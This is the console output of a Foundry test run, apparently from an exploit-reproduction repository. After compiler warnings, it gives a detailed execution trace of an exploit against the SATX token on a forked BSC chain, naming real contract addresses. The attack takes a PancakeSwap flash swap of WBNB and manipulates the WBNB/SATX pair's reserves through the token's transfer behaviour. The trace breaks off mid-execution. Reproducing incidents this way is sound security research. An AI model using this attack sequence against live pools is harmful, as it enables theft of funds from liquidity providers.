Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.28s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-04/SATX_exp.sol:18:5:
   |
18 |     IWBNB constant WBNB = IWBNB(payable(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c));
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2436:1:
     |
2436 | interface WBNB {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2024-04/SATX_exp.sol:15:1:
   |
15 | contract ContractTest is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
  --> src/test/2024-04/SATX_exp.sol:80:5:
   |
80 |     fallback() external payable {}
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/SATX_exp.sol:57:26:
   |
57 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                          ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/SATX_exp.sol:57:42:
   |
57 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                          ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/SATX_exp.sol:57:59:
   |
57 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                                           ^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.17s (4.06ms CPU time)

Ran 1 test for src/test/2024-04/SATX_exp.sol:ContractTest
[PASS] testExploit() (gas: 805820)
Traces:
  [13672] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 37914433 [3.791e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(SATX: [0xFd80a436dA2F4f4C42a5dBFA397064CfEB7D9508], "SATX")
    │   └─ ← [Return]
    ├─ [0] VM::label(WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], "WBNB")
    │   └─ ← [Return]
    ├─ [0] VM::label(PancakeSwap Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], "PancakeSwap Router")
    │   └─ ← [Return]
    ├─ [0] VM::label(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], "pair_WBNB_SATX")
    │   └─ ← [Return]
    ├─ [0] VM::label(pair_WBNB_CAKE: [0x0eD7e52944161450477ee417DE9Cd3a859b14fD0], "pair_WBNB_CAKE")
    │   └─ ← [Return]
    └─ ← [Stop]

  [887920] ContractTest::testExploit()
    ├─ [0] VM::deal(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 900000001000000000 [9e17])
    │   └─ ← [Return]
    ├─ [23974] WBNB::deposit{value: 900000000000000000}()
    │   ├─ emit Deposit(dst: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 900000000000000000 [9e17])
    │   ├─  storage changes:
    │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000000c7d713b49da0000
    │   └─ ← [Stop]
    ├─ [24693] SATX::approve(PancakeSwap Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PancakeSwap Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [24420] WBNB::approve(PancakeSwap Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PancakeSwap Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x0072fde0c25a54a99a0517f551c3cabc4c49d9ef3648fd789a3f57d0243cdb90: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [200756] PancakeSwap Router::swapExactTokensForTokensSupportingFeeOnTransferTokens(1000000000000000 [1e15], 0, [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xFd80a436dA2F4f4C42a5dBFA397064CfEB7D9508], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ [8225] WBNB::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], 1000000000000000 [1e15])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], value: 1000000000000000 [1e15])
    │   │   ├─  storage changes:
    │   │   │   @ 0xc6c3a616e414a3fb90ac3240f431bdc9cce2ff8f36879d24455177ab8a85bdd5: 0x000000000000000000000000000000000000000000000002bdab5777bfd8d950 → 0x000000000000000000000000000000000000000000000002bdaee4f6649f5950
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000000c7d713b49da0000 → 0x0000000000000000000000000000000000000000000000000c79e3bca5138000
    │   │   └─ ← [Return] true
    │   ├─ [4850] SATX::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [2893] pair_WBNB_SATX::getReserves() [staticcall]
    │   │   └─ ← [Return] 50560601813436389712 [5.056e19], 700037530222147848676104 [7e23], 1713283096 [1.713e9]
    │   ├─ [534] WBNB::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   └─ ← [Return] 50561601813436389712 [5.056e19]
    │   ├─ [173762] pair_WBNB_SATX::swap(0, 13810627944496753682 [1.381e19], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [139054] SATX::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 13810627944496753682 [1.381e19])
    │   │   │   ├─ [465] pair_WBNB_SATX::token0() [staticcall]
    │   │   │   │   └─ ← [Return] WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c]
    │   │   │   ├─ [893] pair_WBNB_SATX::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 50560601813436389712 [5.056e19], 700037530222147848676104 [7e23], 1713283096 [1.713e9]
    │   │   │   ├─ [534] WBNB::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   │   └─ ← [Return] 50561601813436389712 [5.056e19]
    │   │   │   ├─ emit Transfer(from: pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], to: SATX: [0xFd80a436dA2F4f4C42a5dBFA397064CfEB7D9508], value: 412937775540452825 [4.129e17])
    │   │   │   ├─ emit Transfer(from: SATX: [0xFd80a436dA2F4f4C42a5dBFA397064CfEB7D9508], to: 0x0001325AD63F16A4CEcdf1c0767920Da65C1bbF9, value: 1339769016895 [1.339e12])
    │   │   │   ├─ emit Transfer(from: SATX: [0xFd80a436dA2F4f4C42a5dBFA397064CfEB7D9508], to: 0x0001325967a384f2aEaB059d356f3622b6857055, value: 1217971833541 [1.217e12])
    │   │   │   ├─ emit Transfer(from: SATX: [0xFd80a436dA2F4f4C42a5dBFA397064CfEB7D9508], to: 0x00013257F90b60A86dDe2D01649a67e73e840fE4, value: 1116474180746 [1.116e12])
    │   │   │   ├─ emit Transfer(from: pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 13397690168956297175 [1.339e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xabff52fa4e2a4bce9184d18dba87477e973ceeaa5fa77f460ef8f7a8905385e2: 0 → 0x0000000000000000000000000000000000000000000000000000011b94c74ac5
    │   │   │   │   @ 0x54c1e42a353ee11a117f98573e0d2806479bc568db61b273d87a817e6cb34e21: 0 → 0x00000000000000000000000000000000000000000000000000000103f30c048a
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000000b9ee283983621fd7
    │   │   │   │   @ 0x08691850d998b3120d0169b27e89f5421eaab41e24a4b8eaf529f63fe605ac45: 0x00000000000000000000000000000000000000000000943d1c4d4b3fe584a308 → 0x00000000000000000000000000000000000000000000943c5ca4164e50b4c558
    │   │   │   │   @ 0x270ba1778f67ad7c8996d2a3468fadb8fccd1bf7fae18a10b8c3f8cccf43bee2: 0x00000000000000000000000000000000000000000000001e04afb7080a8b7b2d → 0x00000000000000000000000000000000000000000000001e0a6ac068a3b11778
    │   │   │   │   @ 32: 54764 → 54767
    │   │   │   │   @ 0xea3095b80cc4c2b9e37a0575a3519021a1df2affb5b77fed6a648d8777d8c550: 0 → 0x00000000000000000000000000000000000000000000000000000137f074d23f
    │   │   │   └─ ← [Return] true
    │   │   ├─ [534] WBNB::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   └─ ← [Return] 50561601813436389712 [5.056e19]
    │   │   ├─ [854] SATX::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   └─ ← [Return] 700023719594203351926104 [7e23]
    │   │   ├─ emit Sync(reserve0: 50561601813436389712 [5.056e19], reserve1: 700023719594203351926104 [7e23])
    │   │   ├─ emit Swap(sender: PancakeSwap Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 1000000000000000 [1e15], amount1In: 3682, amount0Out: 0, amount1Out: 13810627944496753682 [1.381e19], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 9: 0x0000000000000000000000000024f6917785d1f7e9bf6610d2d3ca1fbf062122 → 0x0000000000000000000000000024f717d4f8d97c0119c8480f3a535308880786
    │   │   │   @ 10: 0x000000000000000000000000000000000189aa0e9825e50a6b309948f32389a0 → 0x000000000000000000000000000000000189b5d10534992a3bf2e44c373ace1c
    │   │   │   @ 8: 0x661ea01800000000943d1c4d4b3fe584a308000000000002bdab5777bfd8d950 → 0x661ea29400000000943c5ca4164e50b4c558000000000002bdaee4f6649f5950
    │   │   └─ ← [Stop]
    │   ├─ [850] SATX::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 13397690168956297175 [1.339e19]
    │   └─ ← [Stop]
    ├─ [850] SATX::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 13397690168956297175 [1.339e19]
    ├─ [126427] PancakeSwap Router::addLiquidity(WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], SATX: [0xFd80a436dA2F4f4C42a5dBFA397064CfEB7D9508], 1000000000000000 [1e15], 13397690168956297175 [1.339e19], 0, 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ [2676] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::getPair(WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], SATX: [0xFd80a436dA2F4f4C42a5dBFA397064CfEB7D9508]) [staticcall]
    │   │   └─ ← [Return] pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]
    │   ├─ [893] pair_WBNB_SATX::getReserves() [staticcall]
    │   │   └─ ← [Return] 50561601813436389712 [5.056e19], 700023719594203351926104 [7e23], 1713283732 [1.713e9]
    │   ├─ [3425] WBNB::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], 967693888908859 [9.676e14])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], value: 967693888908859 [9.676e14])
    │   │   ├─  storage changes:
    │   │   │   @ 0xc6c3a616e414a3fb90ac3240f431bdc9cce2ff8f36879d24455177ab8a85bdd5: 0x000000000000000000000000000000000000000000000002bdaee4f6649f5950 → 0x000000000000000000000000000000000000000000000002bdb255132f1f478b
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000000c79e3bca5138000 → 0x0000000000000000000000000000000000000000000000000c76739fda9391c5
    │   │   └─ ← [Return] true
    │   ├─ [42264] SATX::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], 13397690168956297175 [1.339e19])
    │   │   ├─ [465] pair_WBNB_SATX::token0() [staticcall]
    │   │   │   └─ ← [Return] WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c]
    │   │   ├─ [893] pair_WBNB_SATX::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 50561601813436389712 [5.056e19], 700023719594203351926104 [7e23], 1713283732 [1.713e9]
    │   │   ├─ [534] WBNB::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   └─ ← [Return] 50562569507325298571 [5.056e19]
    │   │   ├─ [2439] pair_WBNB_SATX::totalSupply() [staticcall]
    │   │   │   └─ ← [Return] 61147263113290825264665 [6.114e22]
    │   │   ├─ [893] pair_WBNB_SATX::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 50561601813436389712 [5.056e19], 700023719594203351926104 [7e23], 1713283732 [1.713e9]
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], value: 13397690168956297175 [1.339e19])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PancakeSwap Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039444186317744173342760 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0xfcb18ef915b94c2f20b243f9a54944ebfc0246c7a352658e74e5a7ea2daeeb83: 0 → 0x00000000000000000000000000000000000000000000000010bb4661c5ed9df3
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000b9ee283983621fd7 → 0
    │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffff4611d7c67c9de028
    │   │   │   @ 0x08691850d998b3120d0169b27e89f5421eaab41e24a4b8eaf529f63fe605ac45: 0x00000000000000000000000000000000000000000000943c5ca4164e50b4c558 → 0x00000000000000000000000000000000000000000000943d16923e87d416e52f
    │   │   └─ ← [Return] true
    │   ├─ [67682] pair_WBNB_SATX::mint(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─ [534] WBNB::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   └─ ← [Return] 50562569507325298571 [5.056e19]
    │   │   ├─ [854] SATX::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   └─ ← [Return] 700037117284372308223279 [7e23]
    │   │   ├─ [2354] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::feeTo() [staticcall]
    │   │   │   └─ ← [Return] 0x0ED943Ce24BaEBf257488771759F9BF482C39706
    │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1170291895746647915 [1.17e18])
    │   │   ├─ emit Sync(reserve0: 50562569507325298571 [5.056e19], reserve1: 700037117284372308223279 [7e23])
    │   │   ├─ emit Mint(sender: PancakeSwap Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0: 967693888908859 [9.676e14], amount1: 13397690168956297175 [1.339e19])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000000103db647597f576b
    │   │   │   @ 8: 0x661ea29400000000943c5ca4164e50b4c558000000000002bdaee4f6649f5950 → 0x661ea29400000000943d16923e87d416e52f000000000002bdb255132f1f478b
    │   │   │   @ 11: 0x0000000000000000000000000001a6fb9718d7f07c8af592b42ed41145b62ba6 → 0x000000000000000000000000000196528a8b8b39f9c9ea9bb89c1fe8e3af7985
    │   │   │   @ 0: 0x000000000000000000000000000000000000000000000cf2ccbe157405deee19 → 0x000000000000000000000000000000000000000000000cf2dcfbcbbb5f5e4584
    │   │   └─ ← [Return] 1170291895746647915 [1.17e18]
    │   └─ ← [Return] 967693888908859 [9.676e14], 13397690168956297175 [1.339e19], 1170291895746647915 [1.17e18]
    ├─ [439363] pair_WBNB_CAKE::swap(0, 60000000000000000000 [6e19], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x31)
    │   ├─ [8062] WBNB::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 60000000000000000000 [6e19])
    │   │   ├─ emit Transfer(from: pair_WBNB_CAKE: [0x0eD7e52944161450477ee417DE9Cd3a859b14fD0], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 60000000000000000000 [6e19])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000000c76739fda9391c5 → 0x0000000000000000000000000000000000000000000000034d2145bb160391c5
    │   │   │   @ 0x774456c48aa6871068b68c947f132b492bb302d48e494377f521bc0164db1c16: 0x000000000000000000000000000000000000000000000bf896276363f7864848 → 0x000000000000000000000000000000000000000000000bf5557c9148bc164848
    │   │   └─ ← [Return] true
    │   ├─ [389859] ContractTest::pancakeCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 60000000000000000000 [6e19], 0x31)
    │   │   ├─ [854] SATX::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   └─ ← [Return] 700037117284372308223279 [7e23]
    │   │   ├─ [59418] pair_WBNB_SATX::swap(100000000000000 [1e14], 350018558642186154111639 [3.5e23], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x31)
    │   │   │   ├─ [3262] WBNB::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 100000000000000 [1e14])
    │   │   │   │   ├─ emit Transfer(from: pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 100000000000000 [1e14])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000034d2145bb160391c5 → 0x0000000000000000000000000000000000000000000000034d21a0ae267dd1c5
    │   │   │   │   │   @ 0xc6c3a616e414a3fb90ac3240f431bdc9cce2ff8f36879d24455177ab8a85bdd5: 0x000000000000000000000000000000000000000000000002bdb255132f1f478b → 0x000000000000000000000000000000000000000000000002bdb1fa201ea5078b
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [33330] SATX::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 350018558642186154111639 [3.5e23])
    │   │   │   │   ├─ [465] pair_WBNB_SATX::token0() [staticcall]
    │   │   │   │   │   └─ ← [Return] WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c]
    │   │   │   │   ├─ [893] pair_WBNB_SATX::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 50562569507325298571 [5.056e19], 700037117284372308223279 [7e23], 1713283732 [1.713e9]
    │   │   │   │   ├─ [534] WBNB::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 50562469507325298571 [5.056e19]
    │   │   │   │   ├─ [439] pair_WBNB_SATX::totalSupply() [staticcall]
    │   │   │   │   │   └─ ← [Return] 61148433405186571912580 [6.114e22]
    │   │   │   │   ├─ [893] pair_WBNB_SATX::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 50562569507325298571 [5.056e19], 700037117284372308223279 [7e23], 1713283732 [1.713e9]
    │   │   │   │   ├─ emit Transfer(from: pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 350018558642186154111639 [3.5e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xfcb18ef915b94c2f20b243f9a54944ebfc0246c7a352658e74e5a7ea2daeeb83: 0x00000000000000000000000000000000000000000000000010bb4661c5ed9df3 → 0x0000000000000000000000000000000000000000000000000f0507c34d2b79e7
    │   │   │   │   │   @ 0x08691850d998b3120d0169b27e89f5421eaab41e24a4b8eaf529f63fe605ac45: 0x00000000000000000000000000000000000000000000943d16923e87d416e52f → 0x000000000000000000000000000000000000000000004a1e8b491f43ea0b7298
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000004a1e8b491f43ea0b7297
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [5719] ContractTest::pancakeCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 100000000000000 [1e14], 350018558642186154111639 [3.5e23], 0x31)
    │   │   │   │   ├─ [3262] WBNB::transfer(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], 52000000000000000000 [5.2e19])
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], value: 52000000000000000000 [5.2e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000034d21a0ae267dd1c5 → 0x0000000000000000000000000000000000000000000000007b7c8430262dd1c5
    │   │   │   │   │   │   @ 0xc6c3a616e414a3fb90ac3240f431bdc9cce2ff8f36879d24455177ab8a85bdd5: 0x000000000000000000000000000000000000000000000002bdb1fa201ea5078b → 0x0000000000000000000000000000000000000000000000058f57169e1ef5078b
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [534] WBNB::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   │   └─ ← [Return] 102562469507325298571 [1.025e20]
    │   │   │   ├─ [854] SATX::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   │   └─ ← [Return] 350018558642186154111640 [3.5e23]
    │   │   │   ├─ emit Sync(reserve0: 102562469507325298571 [1.025e20], reserve1: 350018558642186154111640 [3.5e23])
    │   │   │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 52000000000000000000 [5.2e19], amount1In: 0, amount0Out: 100000000000000 [1e14], amount1Out: 350018558642186154111639 [3.5e23], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x661ea29400000000943d16923e87d416e52f000000000002bdb255132f1f478b → 0x661ea294000000004a1e8b491f43ea0b72980000000000058f57169e1ef5078b
    │   │   │   └─ ← [Stop]
    │   │   ├─ [850] SATX::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 350018558642186154111639 [3.5e23]
    │   │   ├─ [119018] SATX::transfer(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], 350018558642186154111639 [3.5e23])
    │   │   │   ├─ emit Transfer(from: pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4], to: 0x000000000000000000000000000000000000dEaD, value: 7000371172843723082232 [7e21])
    │   │   │   ├─ [9300] pair_WBNB_SATX::sync()
    │   │   │   │   ├─ [534] WBNB::balanceOf(pair_WBNB_SATX: [0x927d7adF1Bcee0Fa1da868d2d43417Ca7c6577D4]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 102562469507325298571 [1.025e20]
